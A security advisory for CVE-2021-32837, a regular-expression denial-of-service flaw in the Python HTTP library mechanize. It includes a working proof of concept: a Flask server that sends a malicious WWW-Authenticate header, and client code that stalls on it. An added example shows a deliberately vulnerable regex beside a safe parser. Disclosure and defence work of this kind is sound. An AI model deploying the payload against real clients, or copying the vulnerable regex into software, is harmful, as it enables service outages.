CVE-2021-32837: GHSL-2021-108: ReDoS (Regular Expression Denial of Service) in mechanize - CVE-2021-32837

mechanize, a library for automatically interacting with HTTP web servers, contains a regular expression that is vulnerable to regular expression denial of service (ReDoS) prior to version 0.4.6. If a web server responds in a malicious way, then mechanize could crash. Version 0.4.6 has a patch for the issue.

Coordinated Disclosure Timeline

  • 2021-08-31: Created issue asking for contact details.
  • 2021-08-31: They added a security policy and closed the issue. I sent the report to [email protected].
  • 2021-08-31: Issue is fixed by @kovidgoyal.
  • 2021-08-31: Emailed [email protected] to ask if there will be a new release of mechanize and whether there will be an advisory.
  • 2021-09-01: Reply from [email protected]: “New version released”

Summary

mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

mechanize

Tested Version

v0.4.5

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a class of vulnerability affecting inefficient regular expressions: such an expression can perform extremely badly when it is run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the query on mechanize here.

Vulnerability

The vulnerable regular expression is here.

mechanize is a library for automatically interacting with HTTP web servers. If the web server responds in a malicious way, then mechanize could crash.

The reproduction steps below first start a web server and then start mechanize. You can try to delete the resp.headers[… line to see how mechanize should behave.

  • Install mechanize and flask: pip3 install mechanize flask

  • Run the server below with python3:

    from flask import Flask, make_response

    app = Flask(__name__)


    @app.route("/")
    def home():
        # Answer every request with a 401 whose WWW-Authenticate value is a bare ","
        # (the response that triggers the slow regular expression in mechanize).
        resp = make_response("401 Unauthorized")
        resp.status_code = 401
        resp.headers["www-authenticate"] = ","
        return resp


    if __name__ == "__main__":
        app.run(debug=True, port=8080)

  • Leave the above server running while doing the next steps.

  • Run the below with python3:

    import mechanize

    # Credentials are only needed so that mechanize parses the 401 challenge.
    br = mechanize.Browser()
    br.add_password("http://localhost:8080", "admin", "password")
    br.open("http://localhost:8080")
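The following is an added example written for this page; it is not code from mechanize, from the advisory, or from the reproduction steps above. It illustrates the two sides of the ReDoS section: the regex in it (AMBIGUOUS_REALM_RE) is a constructed anti-pattern with the ambiguous-quantifier shape that causes catastrophic backtracking, and is not the expression from mechanize; the helpers split_unquoted, parse_challenges and time_match are illustrative names. Since the reproduction above triggers the problem through a WWW-Authenticate header whose value is a bare ",", the example times the constructed regex on inputs made only of commas and shows a single-pass parser for WWW-Authenticate challenge lists that handles the same input in linear time.

```python
"""Added example for this advisory (not mechanize's code).

Two things are shown:
  1. a constructed regular expression with the ambiguous-quantifier shape
     that makes ReDoS possible, timed on inputs made of nothing but commas
     (the reproduction above triggers the bug with a "," header value);
  2. a single-pass parser for WWW-Authenticate challenge lists that does
     the same job in O(n) and therefore cannot be stalled by such input.
The regex below is constructed for illustration; it is NOT the pattern
from mechanize.
"""
import re
import time

# Constructed anti-pattern: "(?:.*,)*" lets ".*" consume commas as well,
# so a run of n commas that ultimately fails to match is tried in ~2**n
# different partitions before the engine gives up.
AMBIGUOUS_REALM_RE = re.compile(r'(?:.*,)*[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"')


def time_match(pattern, text):
    """Seconds spent in one anchored match attempt of `pattern` on `text`."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start


def split_unquoted(value, sep=","):
    """Split `value` on `sep` outside double quotes in one left-to-right pass."""
    parts, buf, quoted, escaped = [], [], False, False
    for ch in value:
        if escaped:                      # char after a backslash inside quotes
            buf.append(ch)
            escaped = False
        elif quoted and ch == "\\":
            buf.append(ch)
            escaped = True
        elif ch == '"':
            quoted = not quoted
            buf.append(ch)
        elif ch == sep and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return parts


def parse_challenges(header_value):
    """Parse a WWW-Authenticate value into [(scheme, {param: value}), ...].

    'Basic realm="a", Digest realm="b", nonce="n"' becomes
    [("Basic", {"realm": "a"}), ("Digest", {"realm": "b", "nonce": "n"})].
    Empty pieces (the bare "," from the reproduction) are simply skipped.
    """
    challenges = []
    for piece in split_unquoted(header_value):
        piece = piece.strip()
        if not piece:
            continue
        # A leading bare word (no "=") starts a new challenge, e.g. "Basic".
        head, _, rest = piece.partition(" ")
        if "=" not in head:
            challenges.append((head, {}))
            piece = rest.strip()
            if not piece:
                continue
        if not challenges:
            continue                     # parameter before any scheme: drop it
        key, eq, val = piece.partition("=")
        if not eq:
            continue
        val = val.strip()
        if len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1].replace('\\"', '"')
        challenges[-1][1][key.strip().lower()] = val
    return challenges


if __name__ == "__main__":
    # Regex time roughly doubles per extra comma; the parser stays flat.
    for n in (8, 12, 16):
        commas = "," * n
        print(f"{n:2d} commas: regex {time_match(AMBIGUOUS_REALM_RE, commas):.4f}s, "
              f"parser -> {parse_challenges(commas)}")
    print(parse_challenges('Basic realm="site", Digest realm="api", nonce="n1"'))
```

Running the block prints the regex timings for 8, 12 and 16 commas (each step noticeably slower than the last) next to the parser's instant, empty result for the same input. The design point is the one the advisory's fix embodies: input that a remote server controls should be handled by a parser whose cost is bounded by the input length, either a hand-written scanner like parse_challenges or a regular expression without ambiguous, overlapping quantifiers, so that a malformed header costs a few microseconds rather than a hang.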

Impact

This issue may lead to a denial of service.

  • CVE-2021-32837

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

You can contact the GHSL team at [email protected]; please include a reference to GHSL-2021-108 in any communication regarding this issue.

Related news

GHSA-g3pv-pj5f-3hfq: mechanize Regular Expression Denial of Service vulnerability